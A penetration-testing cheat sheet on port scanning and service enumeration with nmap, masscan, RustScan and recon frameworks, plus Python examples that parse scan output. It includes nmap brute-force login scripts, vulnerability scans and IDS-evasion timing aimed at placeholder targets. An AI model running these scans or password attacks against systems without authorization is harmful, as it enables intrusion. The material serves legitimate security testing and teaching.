
Nmap & Service Enumeration - Commands and Process


RustScan for High Speed Open Ports Detection

https://github.com/RustScan/RustScan/releases
download the Debian package for your architecture and install it
sudo dpkg -i filename.deb

rustscan 10.10.10.10
rustscan 10.10.10.0/24 -p 80,443 --no-nmap   # --no-nmap: only report the open ports, skip the nmap follow-up scan

or you can use masscan (raw sockets, so run it as root; --rate is packets per second, and 15000 pps will trip IDS/IPS on most networks)
sudo masscan --rate 15000 -oB myscan.mass 10.0.0.0/8 --ports 0-65535
Reconnoitre for service enum

git clone https://github.com/codingo/Reconnoitre.git
cd Reconnoitre
python setup.py install

reconnoitre -t 10.10.10.10 --services -o new_recon
Vanquish - Information Gathering

git clone https://github.com/frizb/Vanquish.git
cd Vanquish
python2.7 Vanquish2.py -install

echo 192.168.126.133 >> test.txt
vanquish -hostFile test.txt -logging

#read the output, located in hosts directory
sn1per - Automated Enum

git clone https://github.com/1N3/Sn1per
cd Sn1per
bash install.sh


#NORMAL MODE + OSINT + RECON
sniper -t <TARGET> -o -re

sniper -t 10.10.10.10 -m vulnscan
sniper -t 10.10.10.10 -m webscan
Nmap Commands for Internal scans

sudo nmap -sV -sC 10.10.10.10 -p 22 -oN nmap

#Scan all 65535 TCP ports very fast: --min-rate 10000 asks nmap for at least 10,000 packets per second
nmap -p- -v --min-rate 10000 -oA nmap/allports 10.10.10.10

#Common ports scan (no spaces inside the port list, otherwise nmap treats the rest as a target)
nmap -p80,23,443,21,22,25,3389,110,445,139,143,53,135,3306,8080,1723,111,995,993,5900,8443,8000,1433,1434,1521,1630,5432 -Pn -oA scan 10.30.214.0/24 --randomize-hosts --open

#Nmap script scan using categories
nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 10.10.10.10

#Segmentation test using nmap (all TCP ports, no ping, no DNS, 100 hosts in parallel)
sudo nmap -Pn -p- --min-hostgroup 100 --min-parallelism 100 -T4 -n -sS 10.10.10.0/24 -oG scan_result.grep
Port Scanning using Netcat/nc

netcat -v -z -n -w 1 10.10.10.10 1-1023

for port in $(cat ports.txt); do netcat -v -z -n -w 1 10.10.10.10 $port; done 

-z : Port scanning mode i.e. zero I/O mode.
-v : Be verbose [use twice -vv to be more verbose].
-n : Use numeric-only IP addresses i.e. do not use DNS to resolve ip addresses.
-w 1 : Set the connection timeout to 1 second.
-u : Use udp instead of TCP.
-4 : Force IPv4 version addresses.
-6 : Make sure we use IPv6 version addresses only.
Nmap - How it Works

open --> an application is accepting TCP connections / UDP datagrams on the port

closed --> the port is reachable (nmap gets an answer, e.g. a RST), but no application is listening on it

filtered --> nmap cannot determine the state because a firewall, filter or other network obstacle is dropping the probes

unfiltered --> the port is reachable (a probe gets a response), but nmap cannot tell whether it is open or closed
*only shows up in an ACK scan, which is used to map firewall rule sets

open|filtered --> nmap cannot decide whether the port is open or filtered: the probe got no response, and for these scan types silence is exactly what an open port returns. Appears in UDP, IP protocol, FIN, Null and Xmas scans only

closed|filtered --> nmap is unable to determine whether the port is closed or filtered. Appears only in idle scans (-sI)

Note:

// Run Nmap as root --> it can send raw packets and defaults to a SYN scan, which is faster and never completes a connection; on the local subnet it also discovers hosts via ARP and reports their MAC addresses
// Without root --> it falls back to a TCP connect scan (-sT), and OS detection plus the other raw-packet scan types are unavailable

Nmap has various options for scan speed (use -T)
0 Paranoid: waits 5 minutes between probes (serial), for IDS evasion
1 Sneaky: 15 seconds between probes (serial)
2 Polite: 0.4 seconds between probes (serial), uses less bandwidth and target resources
3 Normal (default): designed not to overwhelm the network or miss targets/ports (parallel)
4 Aggressive: safe to use on most modern networks (parallel); max RTT timeout 1250 ms, max TCP scan delay 10 ms
5 Insane: spends up to 15 minutes per host (gives up on that host and moves on if it takes longer); "assumes that you are on an extraordinarily fast network or are willing to sacrifice some accuracy for speed" (parallel)

Top 20 most common ports (according to Nmap's services list): 80, 23, 443, 21, 22, 25, 3389, 110, 445, 139, 143, 53, 135, 3306, 8080, 1723, 111, 995, 993, 5900
NMAP Detection for TCP (SYN scan)

1. Send SYN & response is SYN-ACK == port open (nmap answers with a RST, so the handshake is never completed)
2. Send SYN & response is RST (RST-ACK) == port closed (a firewall that rejects with RST looks identical)
3. Send SYN & response is an ICMP unreachable error (type 3, code 0, 1, 2, 3, 9, 10 or 13) == filtered
4. Send SYN & no response even after retransmission == filtered, a firewall is dropping the probe

NMAP Detection for UDP

1. Send UDP packet & response is a UDP packet == port open
2. Send UDP packet & response is ICMP port unreachable (type 3, code 3) == port closed
3. Send UDP packet & response is another ICMP unreachable error (type 3, code 0, 1, 2, 9, 10 or 13) == filtered
4. Send UDP packet & no response == open|filtered (an open service will usually ignore an empty datagram)

UDP detection is hard because most services stay silent unless they receive a valid request. Add -sV so nmap sends protocol-specific payloads (DNS, SNMP, NTP, ...) to the open|filtered ports and turns many of them into definite open results.

Most hosts rate-limit ICMP port unreachable messages (Linux: one per second), which is what makes UDP scans so slow. --defeat-icmp-ratelimit speeds the scan up by not waiting for those messages, at the cost of accuracy (the man page warns that non-responsive ports may be reported as closed|filtered instead of open|filtered).
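The TCP classification above, as an added example that is not from the page or from Nmap: a connect scan (what Nmap falls back to without root) against a listener on 127.0.0.1, so it runs offline. The kernel does the handshake; the code only maps what connect() reports back onto Nmap's three TCP states. Ports are whatever the OS hands out, and the assumption is that a RST surfaces as ECONNREFUSED and an ICMP unreachable as ENETUNREACH/EHOSTUNREACH, which is how Linux and the BSDs behave.

```python
"""Connect-scan port classification against a loopback listener.

Added example; not Nmap's code. Uses the OS connect() call the way -sT
does, and maps the kernel's answer onto Nmap's open/closed/filtered.
Ports come from the OS (ephemeral), so nothing here is hard-coded.
"""
import errno
import socket


def open_listener(host="127.0.0.1"):
    """Bind and listen on an ephemeral port; returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def closed_port(host="127.0.0.1"):
    """Reserve an ephemeral port and release it, so nothing listens there."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


def probe(host, port, timeout=1.0):
    """Classify one port the way a connect scan does.

    open     : connect() returns, i.e. SYN -> SYN-ACK -> ACK completed
    closed   : ECONNREFUSED, the kernel received a RST to our SYN
    filtered : timeout (probe silently dropped) or an ICMP unreachable
               error surfaced as ENETUNREACH / EHOSTUNREACH
    Assumption: the kernel reports RST and ICMP errors as these errnos.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except OSError as e:
        if e.errno == errno.ECONNREFUSED:
            return "closed"
        if e.errno in (errno.ENETUNREACH, errno.EHOSTUNREACH):
            return "filtered"
        raise
    finally:
        s.close()  # like -sT: tear the connection down straight away


def connect_scan(host, ports, timeout=1.0):
    """Return {port: state} for the given ports."""
    return {p: probe(host, p, timeout) for p in ports}


def demo():
    """Scan one listening and one closed loopback port.
    Returns (open_port, closed_port, {port: state})."""
    srv, open_p = open_listener()
    try:
        closed_p = closed_port()
        return open_p, closed_p, connect_scan("127.0.0.1", [open_p, closed_p])
    finally:
        srv.close()


if __name__ == "__main__":
    print(demo())
```

Because the handshake completes, the listening application sees a real connection (and logs it); that is the difference a SYN scan avoids by answering the SYN-ACK with a RST instead of an ACK.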
NMAP Scanning Types

1. Connect Scan = -sT
- Uses the OS connect() call: completes the full 3-way handshake and then closes the connection, so the connection shows up in the target's application logs
- Can run without root
- Use it on fragile networks or where raw sockets are not available

2. SYN/Stealth Scan = -sS
- SYN-ACK response == open (nmap tears it down with a RST, no full connection)
- RST response == closed
- No response or ICMP unreachable == filtered
- Requires root privileges (raw packets); the default scan when run as root

3. ACK Scan = -sA
- Only sets ACK and never reports a port as open. Used to map firewall rule sets: RST back == unfiltered, no response or ICMP unreachable == filtered
- (for host discovery the equivalent is the -PA ping option, not -sA)

4. FIN Scan = -sF
- sends packets with only the FIN control bit set

5. Null Scan = -sN
- sets none of the control bits

6. XMAS Scan = -sX
- sets the FIN, PSH, and URG control bits (the packet is "lit up like a Christmas tree")

FIN, Null and Xmas rely on RFC 793 behaviour: a closed port answers with RST, an open port stays silent (so open|filtered). Windows and many network devices send RST to every such probe regardless of state, so against them every port looks closed.

7. Maimon Scan = -sM
- sets the FIN and ACK bits
- BSD-derived TCP stacks respond to such a probe with a RST if the port is closed and nothing if the port is open.

8. Add your own flags via --scanflags [URG|ACK|PSH|RST|SYN|FIN|ECE|CWR|ALL|NONE], names mashed together in any order (e.g. --scanflags URGACKPSH) or as a numeric value

9. Aggressive options = -A
- OS fingerprinting, version scan, script scan with default scripts, and traceroute (that is, -A = -O + -sV + -sC + --traceroute)
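What items 4 to 8 actually put on the wire, as an added example (not Nmap's code): build the bare 20-byte TCP header each flag-based scan sends, with the checksum computed over the IPv4 pseudo-header, and parse a --scanflags value the way the man page describes it (names mashed together, ALL, NONE, or a number). The addresses, ports and sequence number are constructed for illustration; sending the segment would need a raw socket, which is exactly why these scan types need root.

```python
"""Build the TCP header behind Nmap's flag-based scans and --scanflags.

Added example, not Nmap's own code. Addresses and ports are constructed.
"""
import socket
import struct

# Flag bits in the order they occupy the TCP flags byte (RFC 793, RFC 3168)
FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = (1 << i for i in range(8))
FLAG_NAMES = {"FIN": FIN, "SYN": SYN, "RST": RST, "PSH": PSH,
              "ACK": ACK, "URG": URG, "ECE": ECE, "CWR": CWR}

# Flags each scan type sets in its probe (from the descriptions above)
SCAN_FLAGS = {
    "-sS": SYN,              # SYN / stealth scan
    "-sA": ACK,              # ACK scan (firewall rule mapping)
    "-sN": 0,                # Null scan: no control bits at all
    "-sF": FIN,              # FIN scan
    "-sX": FIN | PSH | URG,  # Xmas scan
    "-sM": FIN | ACK,        # Maimon scan
}


def scanflags(spec):
    """Parse a --scanflags value: a number such as 9 (FIN+PSH), flag
    names mashed together in any order (URGACKPSH), or ALL / NONE."""
    spec = spec.upper()
    if spec.isdigit():
        return int(spec) & 0xFF
    if spec == "ALL":
        return 0xFF
    if spec == "NONE":
        return 0
    value = 0
    while spec:
        name, spec = spec[:3], spec[3:]
        if name not in FLAG_NAMES:
            raise ValueError("unknown flag %r in --scanflags" % name)
        value |= FLAG_NAMES[name]
    return value


def _checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip, dst_ip, tcp_len):
    """IPv4 pseudo-header the TCP checksum covers: src, dst, 0, proto, length."""
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip),
                       socket.inet_aton(dst_ip), 0, socket.IPPROTO_TCP, tcp_len)


def build_tcp(src_ip, dst_ip, sport, dport, flags, seq=0, window=1024):
    """20-byte TCP header, no options, no payload, checksum filled in."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0,
                      5 << 4, flags & 0xFF, window, 0, 0)   # data offset 5 words
    csum = _checksum(_pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def flags_of(segment):
    """Flags byte of a TCP segment, plus the names of the bits that are set."""
    bits = segment[13]
    return bits, [n for n, v in FLAG_NAMES.items() if bits & v]


def checksum_ok(src_ip, dst_ip, segment):
    """With a correct checksum in place the one's-complement sum is zero."""
    return _checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def probes(src_ip="192.0.2.10", dst_ip="192.0.2.20", sport=40000, dport=80):
    """One probe per scan type, keyed by the nmap option (constructed hosts)."""
    return {opt: build_tcp(src_ip, dst_ip, sport, dport, f)
            for opt, f in SCAN_FLAGS.items()}
```

Under RFC 793 a closed port answers any of the -sN/-sF/-sX/-sM probes with RST; an open port drops them, which is why those scans can only ever say open|filtered.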
Useful Nmap Probing Options

-Pn : Don't ping, assume all hosts are up (older aliases: -P0 (zero) or -PN)
-PB : Legacy option from older Nmap releases meaning the default ping set: ICMP Echo Request, SYN to TCP 443, ACK to TCP 80, and ICMP Timestamp Request (as UID 0; unprivileged users get TCP connect probes to 80 and 443 instead). Current Nmap does this by default without a flag
-PE : (formerly -PI): Send ICMP Echo Request (ICMP type 8)
-PSports : TCP SYN ping to the listed ports, no space between ports or after the -PS (for example, -PS22,80)
-PP : Send ICMP Timestamp Request (ICMP type 13) to find targets
-PM : Send ICMP Address Mask Request (ICMP type 17) to find targets
-PR : ARP ping (needs raw access: Windows with Npcap, or UID 0 on Linux). Only works for hosts on the same Ethernet subnet and is used automatically there, since ARP is faster and more reliable than ICMP/TCP pings
Nmap Phases

Target enumeration (parse the target spec: IPv4 or IPv6? hostname, CIDR range or list file?)
Host discovery (ping scan)
Reverse DNS resolution (PTR lookups for the live hosts; -n skips it, -R forces it for every target)
Port scanning
Version detection (-sV)
OS detection (-O)
Traceroute (--traceroute)
Script scanning (-sC / --script)
Output (-oN / -oG / -oX / -oA)
Nmap Commands

normal scan: nmap -p 80,443 192.168.1.0/24
target list scan: nmap -iL targets.txt
service version scan: nmap -p 80 -sV www.target.com
script: nmap -p 80 --script=http-title www.target.com
scan all ports: nmap -p1-65535 www.target.com   (same as -p-)
save output: nmap -oN output.txt www.target.com
save output in grepable format: nmap -sn -oG filename 192.168.0.1/24   (-sP is the deprecated alias of -sn, ping scan only)
#Host Discovery: ICMP sweeps (echo, timestamp, address mask), IP protocol ping, UDP ping, SCTP INIT ping and TCP SYN/ACK probes to common ports

nmap -oA scan.dis --stats-every 60s --log-errors --traceroute --reason --randomize-hosts -v -R \
  -PE -PP -PM -PO -PU -PY80,23,443,21,22,25,3389,110,445,139 \
  -PS80,23,443,21,22,25,3389,110,445,139,143,53,135,3306,8080,1723,111,995,5900,1025,587,8888,199,1720,465,548,113,81,6001,10000,514,5060,179,1026,2000,8443,8000,32768,554,26,1433,49152,2001,515,8008,49154,1027,5666,646 \
  -PA80,23,443,21,22,25,3389,110,445,139,143,53,135,3306,8080,1723,111,995,5900,1025,587,8888,199,1720,465,548,113,81,6001,10000,514,5060,179,1026,2000,8443,8000,32768,554,26,1433,49152,2001,515,8008,49154,1027,5666,646 \
  -sS -sV -p21,22,23,25,80,443,8080,8443 10.10.10.10/23

#All TCP ports on the live hosts (-sSVC = -sS -sV -sC; -A already implies -sV -sC -O --traceroute)
nmap -oA top-10000 --stats-every 60s --log-errors --reason --randomize-hosts -v -R -Pn -A -sSVC -p- -iL live-host.txt

#UDP ports scan (all 65535 UDP ports takes hours per host; for a first pass use -sU --top-ports 100 instead of -p-)
nmap -oA nmap-udp-output --stats-every 60s --log-errors --reason --randomize-hosts -v -R -Pn -A -sSVC -sU -p- -iL live-hosts.txt

#vuln scanning of web services (-d is debug output, drop it unless you need it)
nmap -oA web-services -sV -sC -p 80,8080,443,8443,8081,8888,9443 -d --script=http-enum --stats-every 60s -iL live-hosts.txt

#Using scripts selected by name pattern
nmap -n -sV --script "smb* and not brute" 10.10.10.10
#Full Scan
nmap -p- --max-retries 1 --max-rate 500 --max-scan-delay 20 -T4 -v --open -oN fullscan --system-dns --stats-every 3s 10.10.10.10


#Nmap SYN scan on all TCP ports with version detection and default scripts
nmap -sS -sV -sC -v -p- -oA all-TCP 10.10.10.10


#nmap reverse DNS resolution
nmap -Pn -sn -R -oA dns-10.1.0.0_16 10.1.0.0/16

# nmap brute force scripts
nmap -vvv --script http-brute --script-args userdb=users.txt,passdb=pass.txt -p <port> <host>
nmap --script vmauthd-brute -p <port> <host>
nmap --script ftp-brute -p <port> <host>

# scan using set of scripts
nmap -sV --script=smb* -p <port> <host>
#CVE scan (the vulners script queries the vulners.com API, so the scanning host needs internet access)
nmap -sV --script vulners --script-args mincvss=7.0 -p443,9000 --open -oN cve.nmap --system-dns --stats-every 3s 10.10.10.10

#Vulnerabilities scan (every script in the vuln category)
nmap -sV --script vuln -p443,9000 --open -oN vulns.nmap --system-dns --stats-every 3s 172.29.52.26
#Scan for SQL Servers
nmap -p 1433,1434,3306,3882 10.10.1.0/16 -Pn --open -sC -sV --script vulners

#Scan for DC's
nmap -p 88 10.30.197.0/24 -Pn --open -sC -sV --script vulners

Take the IPs (2nd column) from an output file and run a scan on them:

awk '{print $2}' filename            # $2 = 2nd column
awk '{print $2}' filename >> Targets.txt
nmap -iL Targets.txt -sV -sC -oA targets-scan


save output to xml: nmap -oX xml-dump.xml 192.168.0.1 192.168.0.2 192.168.0.23   (targets are separated by spaces, not commas)

full scan output: nmap -oA full-data www.target.com
Scanning IPV6 Targets

#
get ipv6 address
host www.target.com

#Scan
nmap -6 www.target.com
OS scan: 

nmap -O www.target.com
nmap -O --osscan-guess 192.168.1.1 // guess more aggressively when there is no exact match; --max-os-tries=1 saves time
ping sweep, host discovery scan

nmap -sn www.target.com   // -sn = host discovery only, no port scan (-sP is the old name)

version scan:
nmap -sV --allports www.target.com
nmap -sV --version-intensity 9 www.target.com //0-9 range;

default intensity is 7; 9 is max
nmap -sV --version-all www.target.com //goes to intensity 9 automatically

nmap -sV --version-light www.target.com // fragile device
Python Ping Sweep

import subprocess

# Sweep 172.10.0.1-172.10.0.254 with fping: -a prints only alive hosts,
# -q suppresses per-host error output. Note the trailing dot: the loop
# appends the last octet, so a prefix of "172.10.0.1" would probe 172.10.0.11, .12, ...
nrange = "172.10.0."

alive = []
for i in range(1, 255):
    address = nrange + str(i)
    # fping exits 0 when the host answered, non-zero otherwise
    res = subprocess.call(['fping', '-a', '-q', address])
    if res == 0:
        alive.append(address)

print(alive)
Scanning for Specific Flags

syn scan: nmap -sS www.target.com
tcp connect scan: nmap -sT www.target.com
udp scan: nmap -sU www.target.com // very slow scan
sctp INIT scan: -sY // SCTP is a third transport protocol (SS7/SIGTRAN, telecom gear); the INIT scan is the SCTP equivalent of a SYN scan
TCP NULL scan: -sN // doesn't set any tcp flags in the packet
FIN scan: -sF // sets only the FIN flag
Xmas scan: -sX // sets FIN, PSH and URG, lighting the packet up "like a Christmas tree"
TCP ACK scan: -sA // used to audit firewalls (reports filtered vs unfiltered, never open)
Nmap Performance tuning:

-T paranoid|sneaky|polite|normal|aggressive|insane
      0       1      2      3       4         5
-T3 is the default

#-T4 is equivalent to the timing values spelled out here (plus a 10 ms max TCP scan delay)
nmap -T4 www.target.com --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6


#scan at least 5 and at most 10 hosts at a time
nmap --min-hostgroup 5 --max-hostgroup 10 192.168.1.0/24

#hostgroup = hosts scanned in parallel, parallelism = probes outstanding per group
nmap --min-hostgroup 10 --min-parallelism 10 --max-parallelism 20 192.168.1.0/24

#less accurate results, higher performance (the default is up to 10 retries, lowered by the faster -T templates)
nmap --max-retries 1 www.target.com

#give up on a host after 10 minutes
nmap --host-timeout 10m www.target.com
Nmap script Scan

cd /usr/share/nmap/
ls
cd scripts/
ls | wc -l // 516 scripts or so, depending on the version

nmap -sV --script http-wordpress-brute www.target.com

nmap -sC www.target.com // default category of NSE scripts (same as --script default)

nmap --script discovery www.target.com // discovery is a category

nmap --script=http-title,http-wordpress-brute www.target.com


Automating Scan for Multiple IP's for AutoRecon.sh

git clone https://github.com/Bhanunamikaze/AutoRecon.git
cd AutoRecon
chmod +x ./requirements.sh
sudo ./requirements.sh 

cp AutoRecon.sh /usr/local/bin/AutoRecon.sh

#save the following as startscan.sh: one background AutoRecon run per IP, then wait for all of them
for ip in $(cat "$1"); do AutoRecon.sh "$ip" All & done; wait
chmod +x startscan.sh

./startscan.sh ips.txt
Masscan/NMAP Useful Grep Commands

sudo masscan -p0-65535 --rate 15000 -oB myscan.mass 10.0.0.0/8

#Convert the binary output to greppable format
masscan --open --readscan myscan.mass -oG myscan.grep

#Extract all live hosts
grep /open/ myscan.grep | cut -d ' ' -f 2 | sort -uV > myscan-hosts.txt

#Get all ports
grep /open/ myscan.grep | cut -d ' ' -f 4 | cut -d / -f 1 | sort -n | uniq > myscan-ports.txt

#Get all systems with port 80 open
grep ' 80/open/' myscan.grep | cut -d ' ' -f 2 | sort -uV > myscan-80.txt

#Get all live host:port pairs
grep /open/ myscan.grep | cut -d / -f 1 | cut -d ' ' -f 2,4 | sed -e 's/ /:/g' | sort -uV > myscan-host-port.txt
#Get ports and services from a comma-separated port list exported from nmap XML (columns 2 and 3 = port, service; strips quotes, drops the header line and tcpwrapped ports)
cat /tmp/ports | cut -d , -f2,3 | sort | uniq | tr -d \" | grep -v -E 'port|tcpwrapped' | sort -n

#Grep for SSL/HTTP ports from an nmap -oN file
cat ports.nmap | grep 'ssl/http' | cut -d ' ' -f1 | cut -d / -f 1

#Replace newlines with commas (turn a port list into a -p argument)
sed ':a;N;$!ba;s/\n/, /g'

#Return alive hosts on a subnet
nmap -v -sn 192.168.0.0/16 | grep -v "host down" | grep -o -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

#Return alive hosts on a subnet with ping ("1 packets received" is the BSD/macOS wording; Linux ping prints "1 received")
for i in {0..254}; do ping -c 1 172.18.0.$i | tr \\n ' ' | awk '/1 packets received/ {print $2}'; done
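What the heading promises, as an added example that is not part of the page's original commands: pull open ports and service names straight out of nmap XML (-oX) instead of a pre-flattened CSV. It keeps nmap's text convention of labelling a TLS-wrapped service `ssl/http` (the XML carries that as `tunnel="ssl"` on the service element) and drops `tcpwrapped` ports, where the handshake completed but no real service answered. The XML below is a constructed sample in the shape nmap writes, not a real scan.

```python
"""Extract open ports and services from nmap -oX output.

Added example; not from the page. SAMPLE_XML is constructed.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -sV -oX - 10.10.10.0/30" start="0" version="7.94">
<host><status state="up" reason="syn-ack"/>
<address addr="10.10.10.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="8.2p1" method="probed" conf="10"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd" method="probed" conf="10"/></port>
<port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/><service name="http" tunnel="ssl" product="nginx" method="probed" conf="10"/></port>
<port protocol="tcp" portid="8443"><state state="open" reason="syn-ack"/><service name="tcpwrapped" method="probed" conf="8"/></port>
<port protocol="tcp" portid="25"><state state="filtered" reason="no-response"/><service name="smtp" method="table" conf="3"/></port>
</ports></host>
<host><status state="down" reason="no-response"/><address addr="10.10.10.11" addrtype="ipv4"/></host>
</nmaprun>
"""


def parse_nmap_xml(text):
    """Return one dict per open port on a live host, sorted by ip then port.

    'service' follows nmap's text output: 'ssl/http' when the service
    element carries tunnel="ssl". 'tcpwrapped' (handshake accepted, then
    closed: a TCP wrapper or firewall, no identified service) is dropped,
    matching the grep -v above.
    """
    root = ET.fromstring(text)
    rows = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            if name == "tcpwrapped":
                continue
            if svc is not None and svc.get("tunnel") == "ssl":
                name = "ssl/" + name
            rows.append({
                "ip": ip,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": name,
                "product": svc.get("product", "") if svc is not None else "",
            })
    return sorted(rows, key=lambda r: (r["ip"], r["port"]))


def ports_for(rows, service):
    """Ports whose service label matches exactly, e.g. 'ssl/http'."""
    return sorted({r["port"] for r in rows if r["service"] == service})


def comma_list(ports):
    """Join port numbers for a -p argument (the sed newline-to-comma trick)."""
    return ", ".join(str(p) for p in ports)


if __name__ == "__main__":
    rows = parse_nmap_xml(SAMPLE_XML)
    for r in rows:
        print("%(ip)s %(port)d/%(proto)s %(service)s %(product)s" % r)
    print("ssl/http on:", comma_list(ports_for(rows, "ssl/http")))
```

Always keep the XML (-oA writes it alongside -oN/-oG): it is the only format that preserves `reason`, `tunnel`, `product`/`version` and script output in a machine-readable way, whereas the text-file greps above are tied to a fixed line layout.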
Grep IP Address and Ports from Nmap Scan Output (113-vlan is an nmap -oG file)

egrep -v "^#|Status: Up" 113-vlan | cut -d' ' -f2,4- | sed -n -e 's/Ignored.*//p' | grep open | sed 's/\/\/\/\///g' | sed 's/\/\/\///g' | sed 's/open\///g' | sed 's#//#/#g'

Output (one line per host: IP, then port/proto/service entries):
127.0.0.1 80/tcp/http,443/tcp/https
127.0.0.2 8080/tcp/http-proxy, 9191/tcp
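The masscan cut/sed pipelines and the nmap egrep pipeline above both wrestle the same grepable (-oG) layout into host and port lists. As an added example (not from the page), here is one parser that handles both flavours: masscan writes one `Ports:` entry per line, nmap puts every port of a host on one tab-separated line followed by an `Ignored State:` field, and each entry is `port/state/proto/owner/service/rpc/version`. The scan text is a constructed sample in the shape the two tools write, not real output.

```python
"""Parse grepable (-oG) output from masscan or nmap into host/port lists.

Added example replacing the cut/sed pipelines; not part of the page.
SAMPLE_GREPABLE is constructed.
"""

SAMPLE_GREPABLE = """# Masscan 1.3.2 scan initiated
# Ports scanned: TCP(65536;0-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.0.0.9 ()\tPorts: 22/open/tcp////
Host: 10.0.0.5 ()\tPorts: 443/open/tcp////
Host: 10.0.0.5 ()\tPorts: 80/open/tcp////
# Nmap 7.94 scan initiated as: nmap -sV -oG - 127.0.0.1
Host: 127.0.0.1 (localhost)\tStatus: Up
Host: 127.0.0.1 (localhost)\tPorts: 80/open/tcp//http///, 443/open/tcp//ssl|https///, 8080/open/tcp//http-proxy///, 9191/open/tcp/////, 25/filtered/tcp//smtp///\tIgnored State: closed (995)
# Nmap done
"""


def ip_key(ip):
    """Sort IPv4 addresses numerically, like sort -V."""
    return tuple(int(o) for o in ip.split("."))


def parse_grepable(text):
    """Return sorted, de-duplicated (ip, port, proto, service) for open ports.

    Entry fields: port/state/proto/owner/service/rpc/version. masscan
    leaves everything after proto empty; nmap fills in service.
    """
    rows = set()
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                        # comments and blank lines
        fields = line.split("\t")
        ip = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue                    # Status: / Ignored State:
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 3 or parts[1] != "open":
                    continue
                service = parts[4] if len(parts) > 4 else ""
                rows.add((ip, int(parts[0]), parts[2], service))
    return sorted(rows, key=lambda r: (ip_key(r[0]), r[1]))


def live_hosts(rows):
    """Hosts with at least one open port (myscan-hosts.txt)."""
    return sorted({r[0] for r in rows}, key=ip_key)


def open_ports(rows):
    """Every open port number seen (myscan-ports.txt)."""
    return sorted({r[1] for r in rows})


def hosts_with_port(rows, port):
    """Hosts with a given port open (myscan-80.txt)."""
    return sorted({r[0] for r in rows if r[1] == port}, key=ip_key)


def host_port_summary(rows):
    """{ip: '80/tcp/http,443/tcp/ssl|https'}, the shape the egrep pipeline prints."""
    out = {}
    for ip, port, proto, svc in rows:
        label = "%d/%s" % (port, proto) + ("/" + svc if svc else "")
        out.setdefault(ip, []).append(label)
    return {ip: ",".join(labels) for ip, labels in out.items()}


if __name__ == "__main__":
    rows = parse_grepable(SAMPLE_GREPABLE)
    for ip, summary in host_port_summary(rows).items():
        print(ip, summary)
```

Splitting on tabs first is what makes this robust: the `cut -d ' ' -f 4` trick only works while the tab between `()` and `Ports:` keeps the port in the fourth space-separated field.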
 



